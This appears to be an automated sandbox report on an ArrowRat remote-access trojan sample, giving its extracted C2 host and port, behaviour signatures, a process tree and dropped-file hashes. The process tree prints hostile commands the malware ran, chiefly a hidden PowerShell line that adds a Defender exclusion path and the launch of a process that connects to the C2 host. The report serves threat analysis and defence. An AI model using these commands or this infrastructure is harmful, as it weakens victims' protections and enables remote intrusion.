Analysis

  • max time kernel
    300s
  • max time network
    307s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-03-2024 11:48

General

  • Target

    https://www.upload.ee/files/16384710/Client.exe.html

Malware Config

Extracted

Family

arrowrat

Botnet

svchost

C2

authority-amazon.gl.at.ply.gg:41414

Mutex

mNnfMgqNP

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 28 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 14 IoCs
  • Modifies registry class 64 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.upload.ee/files/16384710/Client.exe.html
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3576
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8784446f8,0x7ff878444708,0x7ff878444718
      2⤵
        PID:1932
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,14384938869580117799,16229118820504057684,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
        2⤵
          PID:1604
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,14384938869580117799,16229118820504057684,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4092
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,14384938869580117799,16229118820504057684,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8
          2⤵
            PID:400
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,14384938869580117799,16229118820504057684,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
            2⤵
              PID:1460
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,14384938869580117799,16229118820504057684,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
              2⤵
                PID:2972
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,14384938869580117799,16229118820504057684,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1
                2⤵
                  PID:4776
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,14384938869580117799,16229118820504057684,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:1
                  2⤵
                    PID:4088
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,14384938869580117799,16229118820504057684,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1
                    2⤵
                      PID:4424
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,14384938869580117799,16229118820504057684,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
                      2⤵
                        PID:5112
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,14384938869580117799,16229118820504057684,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:1
                        2⤵
                          PID:672
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,14384938869580117799,16229118820504057684,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5940 /prefetch:1
                          2⤵
                            PID:5288
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,14384938869580117799,16229118820504057684,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:1
                            2⤵
                              PID:5296
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,14384938869580117799,16229118820504057684,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:1
                              2⤵
                                PID:5472
                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,14384938869580117799,16229118820504057684,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:8
                                2⤵
                                  PID:5736
                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,14384938869580117799,16229118820504057684,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:8
                                  2⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:5752
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,14384938869580117799,16229118820504057684,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:1
                                  2⤵
                                    PID:6056
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2112,14384938869580117799,16229118820504057684,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4792 /prefetch:8
                                    2⤵
                                      PID:6068
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2112,14384938869580117799,16229118820504057684,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6696 /prefetch:8
                                      2⤵
                                        PID:748
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2112,14384938869580117799,16229118820504057684,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6300 /prefetch:8
                                        2⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:5632
                                      • C:\Users\Admin\Downloads\Client.exe
                                        "C:\Users\Admin\Downloads\Client.exe"
                                        2⤵
                                        • Modifies WinLogon for persistence
                                        • Checks computer location settings
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        • Modifies registry class
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of SetWindowsHookEx
                                        PID:5736
                                        • C:\Windows\explorer.exe
                                          "C:\Windows\explorer.exe"
                                          3⤵
                                          • Modifies Installed Components in the registry
                                          • Enumerates connected drives
                                          • Checks SCSI registry key(s)
                                          • Modifies Internet Explorer settings
                                          • Modifies registry class
                                          • Suspicious behavior: AddClipboardFormatListener
                                          • Suspicious behavior: GetForegroundWindowSpam
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of FindShellTrayWindow
                                          • Suspicious use of SendNotifyMessage
                                          • Suspicious use of SetWindowsHookEx
                                          PID:748
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" svchost authority-amazon.gl.at.ply.gg 41414 mNnfMgqNP
                                          3⤵
                                            PID:4488
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "cmd.exe" /c taskkill /F /IM edge.exe
                                              4⤵
                                                PID:5520
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /F /IM edge.exe
                                                  5⤵
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:6880
                                            • C:\Windows\System32\ComputerDefaults.exe
                                              "C:\Windows\System32\ComputerDefaults.exe"
                                              3⤵
                                                PID:5124
                                                • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
                                                  "PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost\svchost '
                                                  4⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3096
                                            • C:\Users\Admin\Downloads\Client.exe
                                              "C:\Users\Admin\Downloads\Client.exe"
                                              2⤵
                                              • Checks computer location settings
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              • Suspicious use of SetWindowsHookEx
                                              PID:264
                                              • C:\Windows\explorer.exe
                                                "C:\Windows\explorer.exe"
                                                3⤵
                                                  PID:3348
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" svchost authority-amazon.gl.at.ply.gg 41414 mNnfMgqNP
                                                  3⤵
                                                    PID:856
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "cmd.exe" /c D:
                                                      4⤵
                                                        PID:940
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "cmd.exe" /c C:/Users/Admin/Desktop/StopUndo.png
                                                        4⤵
                                                          PID:5176
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "cmd.exe" /c C:/Users/Admin/Desktop/StopUndo.png
                                                          4⤵
                                                            PID:1868
                                                        • C:\Windows\System32\ComputerDefaults.exe
                                                          "C:\Windows\System32\ComputerDefaults.exe"
                                                          3⤵
                                                            PID:4508
                                                            • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
                                                              "PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost\svchost '
                                                              4⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:5856
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,14384938869580117799,16229118820504057684,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4020 /prefetch:1
                                                          2⤵
                                                            PID:6484
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,14384938869580117799,16229118820504057684,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7072 /prefetch:1
                                                            2⤵
                                                              PID:6492
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,14384938869580117799,16229118820504057684,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7260 /prefetch:1
                                                              2⤵
                                                                PID:7068
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,14384938869580117799,16229118820504057684,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:1
                                                                2⤵
                                                                  PID:7076
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,14384938869580117799,16229118820504057684,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4904 /prefetch:2
                                                                  2⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:4256
                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                1⤵
                                                                  PID:1104
                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                  1⤵
                                                                    PID:1432
                                                                  • C:\Windows\system32\taskmgr.exe
                                                                    "C:\Windows\system32\taskmgr.exe" /4
                                                                    1⤵
                                                                    • Checks SCSI registry key(s)
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    • Suspicious use of SendNotifyMessage
                                                                    PID:1440
                                                                  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                    1⤵
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:5844
                                                                  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                    1⤵
                                                                    • Modifies Internet Explorer settings
                                                                    • Modifies registry class
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:6192
                                                                  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                    1⤵
                                                                    • Modifies Internet Explorer settings
                                                                    • Modifies registry class
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:4224
                                                                  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                    1⤵
                                                                    • Modifies Internet Explorer settings
                                                                    • Modifies registry class
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:3732
                                                                  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                    1⤵
                                                                    • Modifies Internet Explorer settings
                                                                    • Modifies registry class
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:1056
                                                                  • C:\Windows\system32\BackgroundTransferHost.exe
                                                                    "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                    1⤵
                                                                      PID:6484
                                                                    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                      1⤵
                                                                      • Modifies Internet Explorer settings
                                                                      • Modifies registry class
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:4976
                                                                    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                      1⤵
                                                                      • Modifies registry class
                                                                      PID:6924
                                                                    • C:\Windows\system32\mspaint.exe
                                                                      "C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\StopUndo.png" /ForceBootstrapPaint3D
                                                                      1⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:6424
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
                                                                      1⤵
                                                                      • Drops file in System32 directory
                                                                      PID:5876
                                                                    • C:\Windows\system32\OpenWith.exe
                                                                      C:\Windows\system32\OpenWith.exe -Embedding
                                                                      1⤵
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:3384
                                                                    • C:\Windows\system32\taskmgr.exe
                                                                      "C:\Windows\system32\taskmgr.exe" /4
                                                                      1⤵
                                                                      • Checks SCSI registry key(s)
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:6456
                                                                    • C:\Windows\System32\rundll32.exe
                                                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                      1⤵
                                                                        PID:4664

                                                                      Network

                                                                      MITRE ATT&CK Enterprise v15

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

                                                                        Filesize

                                                                        64KB

                                                                        MD5

                                                                        d2fb266b97caff2086bf0fa74eddb6b2

                                                                        SHA1

                                                                        2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

                                                                        SHA256

                                                                        b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

                                                                        SHA512

                                                                        c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

                                                                      • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

                                                                        Filesize

                                                                        4B

                                                                        MD5

                                                                        f49655f856acb8884cc0ace29216f511

                                                                        SHA1

                                                                        cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

                                                                        SHA256

                                                                        7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

                                                                        SHA512

                                                                        599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

                                                                      • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

                                                                        Filesize

                                                                        944B

                                                                        MD5

                                                                        6bd369f7c74a28194c991ed1404da30f

                                                                        SHA1

                                                                        0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

                                                                        SHA256

                                                                        878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

                                                                        SHA512

                                                                        8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PowerShell.exe.log

                                                                        Filesize

                                                                        2KB

                                                                        MD5

                                                                        d85ba6ff808d9e5444a4b369f5bc2730

                                                                        SHA1

                                                                        31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                        SHA256

                                                                        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                        SHA512

                                                                        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                        Filesize

                                                                        152B

                                                                        MD5

                                                                        7c6136bc98a5aedca2ea3004e9fbe67d

                                                                        SHA1

                                                                        74318d997f4c9c351eef86d040bc9b085ce1ad4f

                                                                        SHA256

                                                                        50c3bd40caf7e9a82496a710f58804aa3536b44d57e2ee5e2af028cbebc6c2f2

                                                                        SHA512

                                                                        2d2fb839321c56e4cb80562e9a1daa4baf48924d635729dc5504a26462796919906f0097dd1fc7fd053394c0eea13c25219dec54ffe6e9abb6e8cb9afa66bada

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                        Filesize

                                                                        152B

                                                                        MD5

                                                                        5c6aef82e50d05ffc0cf52a6c6d69c91

                                                                        SHA1

                                                                        c203efe5b45b0630fee7bd364fe7d63b769e2351

                                                                        SHA256

                                                                        d9068cf3d04d62a9fb1cdd4c3cf7c263920159171d1b84cb49eff7cf4ed5bc32

                                                                        SHA512

                                                                        77ad48936e8c3ee107a121e0b2d1216723407f76872e85c36413237ca1c47b8c40038b8a6349b072bbcc6a29e27ddda77cf686fa97569f4d86531e6b2ac485ed

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                        Filesize

                                                                        312B

                                                                        MD5

                                                                        6d33de855337d48f03d926a6f2aa0824

                                                                        SHA1

                                                                        51c2c9b18b095b7a3be6565f05b255e9d51877f8

                                                                        SHA256

                                                                        439d03925e4bf109166d9bb03f8479192f5b863aae287877fa0f60436715f4ea

                                                                        SHA512

                                                                        f84a858ba41fefb0402cf702155438833aa16be360ba71cda37d24852f586525e339b7571329727e94e5da947e620955c9e548088de21c7760e01af18df9c57c

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                        Filesize

                                                                        3KB

                                                                        MD5

                                                                        3e9fd7483eaecad7879f87e62a46b5dc

                                                                        SHA1

                                                                        eee791c7288d60c76a509158457f5e1e01187617

                                                                        SHA256

                                                                        248013f4b9ae55e46e2968d702f5c1c07f68c4e71dc68cdb9a5414d32b48ef98

                                                                        SHA512

                                                                        eb03129038b3502da91690353d6bde7b2e052662990539556b500fc18f7f31f97c45901559deff7eb63bdd75ffb22fef81e87a7a3bf9417659583ab1c3a9247b

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                        Filesize

                                                                        8KB

                                                                        MD5

                                                                        911cf7f7f5f1b252c455300cb4ce24da

                                                                        SHA1

                                                                        481fd2e4eea162198595e1cdf561c379162adb21

